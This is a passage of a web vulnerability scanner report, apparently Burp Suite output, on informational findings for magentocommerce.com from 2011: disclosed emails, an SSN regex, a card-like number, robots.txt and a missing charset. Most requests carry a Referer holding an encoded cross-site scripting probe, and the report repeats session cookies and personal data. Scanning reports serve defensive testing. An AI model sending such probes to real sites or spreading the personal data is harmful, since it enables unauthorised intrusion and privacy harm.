<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.14. http://www.magentocommerce.com/products/js/mage/cookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/mage/cookies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/mage/cookies.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:39 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 2633

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.15. http://www.magentocommerce.com/products/js/mage/translate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/mage/translate.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/mage/translate.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:03 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:39 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:03 GMT
Cache-Control: max-age=604800
Content-Length: 1615

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.16. http://www.magentocommerce.com/products/js/scriptaculous/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/scriptaculous/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/scriptaculous/controls.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:02 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:37 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:02 GMT
Cache-Control: max-age=604800
Content-Length: 34797

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
8.17. http://www.magentocommerce.com/products/js/scriptaculous/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/scriptaculous/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/scriptaculous/dragdrop.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:37 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 31192

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...
8.18. http://www.magentocommerce.com/products/js/varien/form.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/varien/form.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/varien/form.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 17 May 2011 07:43:15 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 11801

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.19. http://www.magentocommerce.com/products/js/varien/js.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/js/varien/js.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/js/varien/js.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:02 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:37 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:02 GMT
Cache-Control: max-age=604800
Content-Length: 18250

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.20. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/css/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /products/skin/frontend/enterprise/mc/css/print.css HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:02 GMT
Content-Type: text/css
Last-Modified: Mon, 21 Feb 2011 10:55:27 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:02 GMT
Cache-Control: max-age=604800
Content-Length: 1431

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.21. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/css/styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /products/skin/frontend/enterprise/mc/css/styles.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:08 GMT
Content-Type: text/css
Last-Modified: Fri, 05 Aug 2011 06:36:18 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:01:08 GMT
Cache-Control: max-age=604800
Content-Length: 183351

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.22. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/widgets.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/css/widgets.css

Issue detail

The following email address was disclosed in the response:

Request

GET /products/skin/frontend/enterprise/mc/css/widgets.css HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:02 GMT
Content-Type: text/css
Last-Modified: Mon, 21 Feb 2011 10:55:27 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:02 GMT
Cache-Control: max-age=604800
Content-Length: 9278

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.23. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:55:28 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 3133

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.24. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/js/scripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /products/skin/frontend/enterprise/mc/js/scripts.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Jul 2011 14:52:11 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 54346

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...
URL:
* http://www.magentocommerce.com/license/enterprise-edition
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
8.25. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The following email address was disclosed in the response:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.26. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The following email address was disclosed in the response:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
9. Social security numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.magentocommerce.com
Path:   /products/js/prototype/validation.js

Issue detail

The following social security number was disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /products/js/prototype/validation.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:02 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 10 Aug 2011 18:17:37 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:02 GMT
Cache-Control: max-age=604800
Content-Length: 37075

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew Tetlaw

...[SNIP]...
unction (v) {
return Validation.get('IsEmpty').test(v) || /^[A-Z][A-Z0-9_\/-]*$/i.test(v)
}],
['validate-ssn', 'Please enter a valid social security number. For example 123-45-6789.', function(v) {
return Validation.get('IsEmpty').test(v) || /^\d{3}-?\d{2}-?\d{4}$/.test(v);
}],
['validate-zip', 'Please enter a valid zip code. For example 90602 or 9060
...[SNIP]...
10. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<br />
4485362859528762
</p>
...[SNIP]...
11. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /css/homepage.css

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:38:27 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 10 Jun 2011 17:04:14 GMT
ETag: "d88850-13d-4a55e8f263f80"
Accept-Ranges: bytes
Content-Length: 317

User-agent: *
#Disallow: /
Disallow: /member/
Disallow: /ignore_member/
Disallow: /rss_2.0/
Disallow: /new_topic_search/
Disallow: /view_pending_topics/
Disallow: /member_search/
Disallow: /boards/sea
...[SNIP]...
12. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

12.1. http://www.magentocommerce.com/images/avatars/uploads/avatar_19608.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /images/avatars/uploads/avatar_19608.png

Request

GET /images/avatars/uploads/avatar_19608.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:28 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...
12.2. http://www.magentocommerce.com/img/btn_submit.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/btn_submit.gif

Request

